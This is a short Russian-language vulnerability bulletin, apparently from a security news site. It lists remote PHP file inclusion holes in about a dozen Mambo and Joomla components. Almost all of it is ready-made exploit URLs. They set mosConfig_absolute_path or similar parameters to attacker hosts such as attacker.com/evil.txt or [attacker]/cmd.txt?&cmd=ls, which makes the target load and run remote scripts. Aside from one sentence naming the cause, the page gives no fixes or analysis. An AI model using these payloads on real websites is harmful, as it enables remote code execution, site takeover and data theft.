Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах скриптов различных компонент.

Программа: pollxt mambo Component

http://www.vuln.com/components/com_pollxt/conf.pollxt.php? mosConfig_absolute_path=http://evilhost

Программа: Sitemap 2.0.0 for Mambo 4.5.1 CMS

http://[target]/[path]/components/com_sitemap/sitemap.xml.php? mosConfig_absolute_path=http://attacker.com/evil.txt?

Программа: HTMLArea3 addon — ImageManager 1.5

http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ ImageManager/config.inc.php?mosConfig_absolute_path =http://evilscript

Программа: com_hashcash Component 1.2.1

http://[target]/[path]/components/com_hashcash/server.php? mosConfig_absolute_path= http://attacker.com/evil.txt?

Программа: MiniBB Forum Mambo Component <= 1.5a

http://[target]/[path]/components/com_minibb.php? absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php? absolute_path= http://attacker.com/evil.txt?

Программа: perForms <= 1.0

http://www.vuln.com/components/com_performs/ performs.php?mosConfig_absolute_path=http://evilhost

Программа: pc_cookbook Component <= v0.3

http://[target]/[path]/components/com_pccookbook/pccookbook.php? mosConfig_absolute_path=http://evilscript

Программа: com_loudmounth Component

http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]

Программа: ExtCalendar Mambo Module <= v2

http://[target]/[path]/components/com_extcalendar/admin_events.php? CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls

Программа: Joomla-SMF Forum Bridge For Mambo

http://[site]/[joomla or mambo path]/components/com_smf/smf.php ?mosConfig_absolute_path=http://[evil scripts]

Программа: com_videodb Mambo Componenet <= 0.3en

http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php? mosConfig_absolute_path=[shell]



Оставить мнение